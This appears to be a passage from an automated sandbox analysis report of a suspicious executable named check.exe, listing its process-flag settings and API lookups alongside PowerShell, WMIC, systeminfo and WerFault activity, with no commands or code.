Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8E5830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,4_2_00007FF61E8E5830
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
